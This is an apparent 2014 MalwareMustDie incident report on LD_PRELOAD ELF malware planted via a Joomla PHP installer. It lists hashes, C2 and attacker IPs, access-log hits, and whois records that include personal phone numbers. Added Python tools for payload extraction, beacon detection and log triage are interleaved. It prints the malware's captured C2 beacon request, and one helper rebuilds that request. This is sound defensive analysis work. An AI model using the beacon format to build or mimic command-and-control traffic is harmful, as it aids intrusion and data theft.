Recent Incident of Linux ELF (LD_PRELOAD) libworker.so

Posted to Pastebin by MalwareMustDie, Jun 10th, 2014
# MalwareMustDie NEW Report of .SO ELF Malware attack incident.
# date: Wed Jun 11 06:38:13 JST 2014
# Analysis by @unixfreaxjp - Report thx to: yin
# Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
# CNC is ALIVE at: 89.45.14.64 (VOXILITY, ROMANIA)
# ATTACKER SOURCE IPs: 103.31.186.33 (VOXILITY, ROMANIA) & 31.202.247.234 (Leased line ISP Format, UKRAINE)

//-------------------------------------
// PHP HACK INJECTION POC
// VICTIM'S WEBAPP: JOOMLA!
//-------------------------------------

// Reported injected installation .SO binaries:
https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/

// Jinxed installer PHP scripts on pastebin:
http://pastebin.com/z1K8jxKJ
http://pastebin.com/Pbsk3ZXU

// Malware binaries extracted from the installer PHP:
https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/

//-------------------------------------
// CNC ANALYSIS
// Using know-how from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
//-------------------------------------

// Extract the binaries from the installer PHP with the dump template:
$ date
Wed Jun 11 04:12:11 JST 2014
$
$ php ./sodump-template.php
SO x32 dumped 26848
SO x64 dumped 27288
MO x32 dumped 26848
MO x64 dumped 27288
$
$ ls -alF
total 600
drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker1-32.so
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker1-64.so
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker2-32.so
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker2-64.so

$ md5 lib*
MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
// Note: only one x32 and one x64 binary are used across the multiple injections (libworker1 and libworker2 have identical MD5s).


$ file lib*
libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
$

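The dump template used above (sodump-template.php) is the author's own tool and is not reproduced on this page. What follows is an added example, not the author's script: a Python equivalent written on one assumption, that the installer PHP carries the .so payloads as base64 text (the real installer may encode them differently). It scans the PHP source for base64 runs, keeps only those that decode to an ELF image, reads EI_CLASS and e_machine from the ELF header to label each as x32 or x64 and to confirm it is a shared object (ET_DYN), and reports size and MD5 so the `ls`, `md5` and `file` checks above can be repeated in one step. The embedded installer and the ELF blobs inside it are constructed stand-ins, not the real samples.

```python
import base64
import hashlib
import re
import struct
from typing import Dict, List

ELF_MAGIC = b"\x7fELF"
_MACHINES = {0x03: "Intel 80386", 0x3E: "x86-64"}
# A base64 run long enough to hold an ELF image; shorter runs are ignored.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def describe_elf(blob: bytes) -> Dict[str, object]:
    """Read class, machine and type from an ELF header (raises ValueError if not ELF)."""
    if len(blob) < 0x14 or not blob.startswith(ELF_MAGIC):
        raise ValueError("not an ELF image")
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", blob[0x10:0x14])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "machine": _MACHINES.get(e_machine, f"0x{e_machine:x}"),
        "shared_object": e_type == 3,          # ET_DYN, what `file` reports as "shared object"
        "size": len(blob),
        "md5": hashlib.md5(blob).hexdigest(),
    }


def extract_embedded_elfs(php_source: bytes) -> List[Dict[str, object]]:
    """Return every base64 run in the PHP source that decodes to an ELF image, in order."""
    found = []
    for match in _B64_RUN.finditer(php_source):
        run = match.group(0)
        run += b"=" * (-len(run) % 4)          # restore padding the installer may have stripped
        try:
            blob = base64.b64decode(run, validate=True)
            info = describe_elf(blob)
        except ValueError:                     # not base64, not ELF, or a malformed ELF header
            continue
        info["data"] = blob
        found.append(info)
    return found


def dump_to_files(php_source: bytes, prefix: str = "libworker") -> List[str]:
    """Write each payload as <prefix>N-<bits>.so, mirroring the file names above."""
    names = []
    for n, info in enumerate(extract_embedded_elfs(php_source), 1):
        name = f"{prefix}{n}-{info['bits']}.so"
        with open(name, "wb") as fh:
            fh.write(info["data"])
        names.append(name)
    return names


def _fake_elf(bits: int) -> bytes:
    """Constructed stand-in payload: a valid ELF header (ET_DYN) followed by filler bytes."""
    ei_class, machine = (1, 0x03) if bits == 32 else (2, 0x3E)
    ident = ELF_MAGIC + bytes([ei_class, 1, 1, 0]) + b"\x00" * 8   # e_ident[16], little-endian
    return ident + struct.pack("<HHI", 3, machine, 1) + b"\x90" * 80


# Constructed installer, not the real one: two payloads plus a base64 string that is not ELF.
SAMPLE_INSTALLER_PHP = (
    b"<?php\n"
    b"$so32 = '" + base64.b64encode(_fake_elf(32)) + b"';\n"
    b"$so64 = '" + base64.b64encode(_fake_elf(64)) + b"';\n"
    b"$note = '" + base64.b64encode(b"not an elf at all, just filler text to look like b64 data") + b"';\n"
    b"file_put_contents('/tmp/libworker.so', base64_decode(PHP_INT_SIZE == 8 ? $so64 : $so32));\n"
)

if __name__ == "__main__":
    for info in extract_embedded_elfs(SAMPLE_INSTALLER_PHP):
        kind = "shared object" if info["shared_object"] else "not ET_DYN"
        print(f"SO x{info['bits']} dumped {info['size']} bytes, {info['machine']}, {kind}, md5 {info['md5']}")
```

Running the real installer through `dump_to_files` would give you the same two distinct images the `md5` listing above shows, one per architecture, regardless of how many times they are referenced in the script.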
// CNC beacon (request and response as captured):

POST /kuku/theend.php HTTP/1.0
Host: erstoryunics.us
Pragma: 1337
Content-Length: 84

R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
HTTP/1.1 200 OK
Date: Tue, 10 Jun 2014 22:12:22 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 6
Connection: close
Content-Type: text/html; charset=UTF-8
R,200

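The exchange above is a one-line comma-separated record POSTed to theend.php under a non-standard `Pragma: 1337` header, with no User-Agent, answered by a matching `R,<status>` record. The following is an added example, not the author's or the malware's code: a small Python parser for captured traffic of this shape and a detector that flags a request showing the traits seen here. The field names (`build`, `arch`, `uname`) are my reading of the single sample and are assumptions; only the field positions are observed. The request used below is rebuilt from the capture with a Content-Length that matches the visible body, and the benign POST is constructed for contrast.

```python
from typing import Dict, List, Optional, Tuple

# Positions observed in the sample record; the names are assumptions, not from the sample.
BEACON_FIELDS = ["rec", "build", "arch", "flag", "unused", "uname", "tail"]


def parse_http_message(raw: bytes) -> Dict[str, object]:
    """Split a raw HTTP request or response into start line, lower-cased headers and body."""
    head, _, body = raw.replace(b"\r\n", b"\n").partition(b"\n\n")
    lines = head.decode("latin-1").split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body.decode("latin-1")}


def parse_beacon_body(body: str) -> Dict[str, str]:
    """Map the comma-separated record onto the assumed field names (trailing ',' gives an empty tail)."""
    return dict(zip(BEACON_FIELDS, body.strip().split(",")))


def parse_server_reply(raw: bytes) -> Optional[str]:
    """Return the status carried in an 'R,<status>' reply, or None if the reply is not one."""
    body = parse_http_message(raw)["body"].strip()
    if not body.startswith("R,"):
        return None
    return body.split(",", 1)[1]


def is_libworker_beacon(raw_request: bytes, threshold: int = 3) -> Tuple[bool, List[str]]:
    """Score a captured request against the traits seen in the beacon above."""
    msg = parse_http_message(raw_request)
    parts = msg["start"].split()
    headers = msg["headers"]
    reasons = []
    if len(parts) >= 2 and parts[0] == "POST" and parts[1].endswith(".php"):
        reasons.append("POST to a .php path")
    if headers.get("pragma") == "1337":
        reasons.append("Pragma: 1337 header")
    if msg["body"].startswith("R,"):
        reasons.append("body is an R, record")
    if "user-agent" not in headers:
        reasons.append("no User-Agent")
    return len(reasons) >= threshold, reasons


def build_beacon(host: str, path: str, fields: List[str]) -> bytes:
    """Client side of the exchange, rebuilt from the capture: fields joined by ',' plus a trailing ','."""
    body = (",".join(fields) + ",").encode("latin-1")
    head = (f"POST {path} HTTP/1.0\r\nHost: {host}\r\nPragma: 1337\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode("latin-1") + body


# Rebuilt from the capture above (Content-Length recomputed for the visible body).
SAMPLE_REQUEST = build_beacon("erstoryunics.us", "/kuku/theend.php",
    ["R", "20130826", "64", "0", "", "UNIX SCO System - MalwareMustDie Bangs Moronz CNC"])
SAMPLE_REPLY = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.2.15 (CentOS)\r\nContent-Length: 6\r\n"
                b"Connection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\nR,200\n")
# Constructed benign POST for contrast: a .php path, but with a User-Agent and no R, record.
BENIGN_REQUEST = (b"POST /index.php HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent: Mozilla/5.0\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 7\r\n\r\nq=hello")

if __name__ == "__main__":
    flagged, why = is_libworker_beacon(SAMPLE_REQUEST)
    record = parse_beacon_body(parse_http_message(SAMPLE_REQUEST)["body"])
    print(flagged, why)
    print(record, "reply status:", parse_server_reply(SAMPLE_REPLY))
```

The `Pragma: 1337` header on its own is the cheapest thing to alert on at a proxy or IDS; the other traits are there so a single missing header does not silence the detection.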
// CNC INFO (NETWORK & GEOIP)

$ echo `dig +short erstoryunics.us`|bash origin.sh
Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
IP Address, City, Country Name, Latitude, longitude, Time Zone
89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest

//-------------------------------------
// ATTACK TIME RANGE (from the victim's web access log):
//-------------------------------------

First session:              [22/May/2014:13:01:08 +1000]
Second session, first hit:  [09/Jun/2014:07:50:46 +1000]
Second session, latest hit: [10/Jun/2014:04:39:51 +1000]

//-------------------------------------
// ATTACKER ACCESS POC & SOURCE IP POC:
//-------------------------------------

// Attacker access log entries hitting the .SO malware installer PHP script:

103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"


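The access log entries above share a signature: scripted hits on the installer script with no Referer and no User-Agent and a fixed 71-byte 200 reply, plus one earlier browser-driven hit on /cache/cache.php. As an added example, not part of the report, here is a Python triage script that parses Apache combined-format lines, keeps every hit on the installer paths named in this report, records the supporting traits per source IP, and derives first- and last-seen timestamps the way the attack time range above was derived. The log lines it runs on are constructed to resemble the ones above (same IPs and paths, plus one benign hit) and are not the victim's log.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, Optional, Tuple

# Apache combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Installer script paths named in this report.
INSTALLER_PATHS = {"/cache.php", "/cache/cache.php", "/jquery.js.php"}
INSTALLER_REPLY_SIZE = 71   # fixed size of the 200 reply seen in the report's log


def parse_line(line: str) -> Dict[str, object]:
    """Parse one combined-format line into typed fields."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    e["size"] = 0 if e["size"] == "-" else int(e["size"])
    return e


def hunt(lines: Iterable[str]) -> Dict[str, Dict[str, object]]:
    """Group hits on installer paths by source IP with first/last seen and supporting traits."""
    per_ip: Dict[str, Dict[str, object]] = defaultdict(
        lambda: {"hits": 0, "first": None, "last": None, "paths": set(), "traits": set()})
    for line in lines:
        e = parse_line(line)
        if e["path"] not in INSTALLER_PATHS:
            continue
        rec = per_ip[e["ip"]]
        rec["hits"] += 1
        rec["paths"].add(e["path"])
        if e["referer"] == "-" and e["ua"] == "-":
            rec["traits"].add("empty Referer and User-Agent")
        if e["status"] == 200 and e["size"] == INSTALLER_REPLY_SIZE:
            rec["traits"].add(f"fixed {INSTALLER_REPLY_SIZE}-byte 200 reply")
        if rec["first"] is None or e["ts"] < rec["first"]:
            rec["first"] = e["ts"]
        if rec["last"] is None or e["ts"] > rec["last"]:
            rec["last"] = e["ts"]
    return dict(per_ip)


def attack_window(report: Dict[str, Dict[str, object]]) -> Optional[Tuple[datetime, datetime]]:
    """Earliest and latest installer hit across all flagged IPs, or None if nothing was flagged."""
    if not report:
        return None
    return (min(r["first"] for r in report.values()),
            max(r["last"] for r in report.values()))


# Constructed lines modelled on the report's entries; not the victim's log.
SAMPLE_LOG = """\
31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
203.0.113.5 - - [10/Jun/2014:04:40:02 +1000] "GET /index.php HTTP/1.1" 200 5120 "http://example.invalid/" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    report = hunt(SAMPLE_LOG)
    for ip, rec in report.items():
        print(f"{ip}: {rec['hits']} hits on {sorted(rec['paths'])}, "
              f"{rec['first']:%d/%b/%Y:%H:%M:%S} .. {rec['last']:%d/%b/%Y:%H:%M:%S}, "
              f"traits={sorted(rec['traits'])}")
    print("attack window:", attack_window(report))
```

On a real log the installer path list is the part to adapt; the empty Referer/User-Agent pair and the constant reply size are what separate the operator's scripted check-ins from the browser-driven first visit.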
//-------------------------------------
// Tracing attacker source IP: 103.31.186.33 (ROMANIA)
//-------------------------------------

$ whois 103.31.186.33
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

% Information related to '103.31.186.0 - 103.31.186.127'

inetnum: 103.31.186.0 - 103.31.186.127
netname: Saulhost
descr: Saulhost Hosting
country: RO
admin-c: MT669-AP
tech-c: MT669-AP
status: ASSIGNED NON-PORTABLE
remarks: INFRA-AW
mnt-by: MAINT-HK-VOXILITY
mnt-lower: MAINT-HK-VOXILITY
mnt-routes: MAINT-HK-VOXILITY
mnt-irt: IRT-VOXILITY-AP
changed: noc@voxility.com 20130118
source: APNIC

irt: IRT-VOXILITY-AP
address: Dimitrie Pompeiu 9-9A
address: Building 24
address: Bucharest 020335
address: Romania
e-mail: noc@voxility.com
abuse-mailbox: noc@voxility.com
admin-c: VOX100
tech-c: VOX100
auth: # Filtered
mnt-by: MAINT-HK-VOXILITY
changed: noc@voxility.com 20121015
source: APNIC

person: Michael Ter-Sahakyan
address: Terbatas 14
address: LV-1011 Riga
address: Latvia
country: RO
phone: +37166163312
e-mail: abuses@saulhost.com
nic-hdl: MT669-AP
remarks: INFRA-AW
abuse-mailbox: abuses@saulhost.com
mnt-by: MAINT-HK-VOXILITY
changed: noc@voxility.com 20130118
source: APNIC

//-------------------------------------
// Tracing attacker source IP: 31.202.247.234 (UKRAINE)
//-------------------------------------


$ whois 31.202.247.234
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '31.202.192.0 - 31.202.255.255'

% Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua'

inetnum: 31.202.192.0 - 31.202.255.255
netname: FORMAT-TV-NET-5
descr: MSP Format Ltd.
country: UA
admin-c: FA4288-RIPE
tech-c: FA4288-RIPE
status: ASSIGNED PA
mnt-by: FORMAT-TV-MNT
mnt-domains: FORMAT-TV-MNT
mnt-routes: FORMAT-TV-MNT
source: RIPE # Filtered

person: Format Admin
address: Ukraine Mariupol
phone: +380629422490
nic-hdl: FA4288-RIPE
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered

% Information related to '31.202.247.0/24AS6712'

route: 31.202.247.0/24
descr: Leased line ISP Format
origin: AS6712
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered


---
#MalwareMustDie!!